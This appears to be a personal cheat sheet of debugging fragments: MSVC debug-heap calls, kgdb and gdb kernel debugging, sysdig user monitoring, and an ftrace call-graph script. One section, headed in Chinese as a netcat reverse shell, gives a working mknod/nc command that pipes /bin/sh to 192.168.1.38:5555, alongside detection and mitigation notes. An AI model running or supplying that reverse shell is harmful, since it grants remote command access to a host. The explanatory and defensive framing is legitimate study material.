// MSVC debug-CRT cheat sheet. Each line is an independent fragment meant for
// debug builds, not a compilable unit.

// Break into the debugger when the debug heap reaches allocation number 12683
// (typically the {N} printed in an earlier leak dump).
_CrtSetBreakAlloc(12683);
// Send a string to the attached debugger's output window.
OutputDebugString("hi");
// Raise a breakpoint exception at this point.
DebugBreak();
// Map the malloc/free family onto the _dbg variants so leak reports carry
// source file and line. Must be defined before <crtdbg.h> is included.
#define _CRTDBG_MAP_ALLOC
#include <crtdbg.h>
// Read the current debug-heap flags (_CRTDBG_REPORT_FLAG only queries), then
// set them again with the leak-dump-at-exit bit added.
_CrtSetDbgFlag(_CrtSetDbgFlag(_CRTDBG_REPORT_FLAG) | _CRTDBG_LEAK_CHECK_DF);
// Route CRT error reports to the debugger output instead of a dialog box.
_CrtSetReportMode(_CRT_ERROR, _CRTDBG_MODE_DEBUG);
// NOTE(review): C4996 is the deprecation warning MSVC raises for the unchecked
// CRT calls (strcpy, sprintf, ...). Disabling it file-wide also hides those
// call sites from review; prefer a narrow #pragma warning(push)/(pop) scope
// or the bounded _s variants.
#pragma warning(disable:4996)
// Emit a message during the build: MSVC uses #pragma message, other compilers
// use #warning.
#ifdef WIN32
#pragma message("message body")
#else
#warning "message body"
#endif
// IDE menu path, not code: /P makes the compiler write the preprocessed
// source to a file.
Project->settings->C/C++->Preprocessor->Project options->/P
// Make every plain `new` record file and line in the debug heap.
// NOTE(review): this breaks headers that use placement new if it is defined
// before they are included; it is usually wrapped in #ifdef _DEBUG - confirm
// at the point of use.
#define new new(_NORMAL_BLOCK, __FILE__, __LINE__)
# Independent command fragments: host monitoring, log trimming, and a kgdb
# session over a serial line.

# Show interactive user activity on the host with sysdig's spy_users chisel
# (needs root; the output can include typed command lines, so treat captures
# as sensitive).
sysdig -c spy_users
# Drop the first 22 characters of every input line (a fixed-width prefix).
sed 's/^.\{22\}//'
# Windows named-pipe path; presumably the host side of a VM's virtual serial
# port used for the kgdb link - confirm against the VM configuration.
\\.\pipe\com_1
# Kernel command line for the debug target: kgdb over ttyS0 at 115200 baud,
# and wait for a debugger to attach during boot.
# NOTE(review): kgdb on a serial line is unauthenticated and exposes full
# kernel memory and registers; keep these options off production boot entries.
quiet kgdbwait kgdboc=ttyS0,115200
# On the running target: SysRq 'g' hands control to the kernel debugger.
echo g > /proc/sysrq-trigger
# gdb: trust auto-load files found under the current directory.
# NOTE(review): auto-loaded files execute gdb/Python commands with the
# user's privileges; set this only inside a source tree you trust.
set auto-load safe-path .
# Host side: load the uncompressed kernel image with symbols, then attach to
# the target over the serial device.
gdb /usr/src/kernels/linux-2.6.32.27/vmlinux
(gdb) target remote /dev/ttyS0
nc反弹shell
# Reverse shell over netcat: the FIFO /tmp/bp carries the bytes nc receives
# into sh's stdin, and sh's stdout leaves through nc to 192.168.1.38:5555.
# Detection: a FIFO created under /tmp by mknod; a /bin/sh whose stdin is that
# FIFO and whose stdout is a pipe into nc; an outbound TCP connection made by
# nc from a host that normally only accepts connections.
# Mitigation: default-deny egress filtering on servers, audit rules on
# mknod/mkfifo and on execve of nc, and keeping netcat off production images.
mknod /tmp/bp p
/bin/sh 0</tmp/bp | nc 192.168.1.38 5555 1>/tmp/bp
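#!/bin/bash
# Trace the kernel call graph beneath one function while a single command runs.
#
# Usage: <this-script> command [args...]
#
# The tracing files under debugfs are normally writable by root only, so the
# script has to run as root, and the command it execs runs as root as well.
# Pass only commands you would run as root anyway.
debugfs=/sys/kernel/debug
tracing="$debugfs/tracing"

# With no command, `exec "$@"` does nothing and the script would exit with
# tracing left enabled for a PID that no longer exists.
if [ "$#" -eq 0 ]; then
    echo "usage: $0 command [args...]" >&2
    exit 1
fi

# Start from a known state: no tracer selected, tracing paused.
echo nop > "$tracing/current_tracer"
echo 0 > "$tracing/tracing_on"
# Limit tracing to this shell's PID; the exec below keeps the same PID, so
# the traced command inherits the filter.
echo $$ > "$tracing/set_ftrace_pid"
echo function_graph > "$tracing/current_tracer"
# Replace vfs_read with the kernel function whose call graph you want.
echo vfs_read > "$tracing/set_graph_function"
echo 1 > "$tracing/tracing_on"
# exec replaces the shell, so no cleanup can run here. Afterwards, read
# $tracing/trace and write 0 to $tracing/tracing_on by hand.
exec "$@"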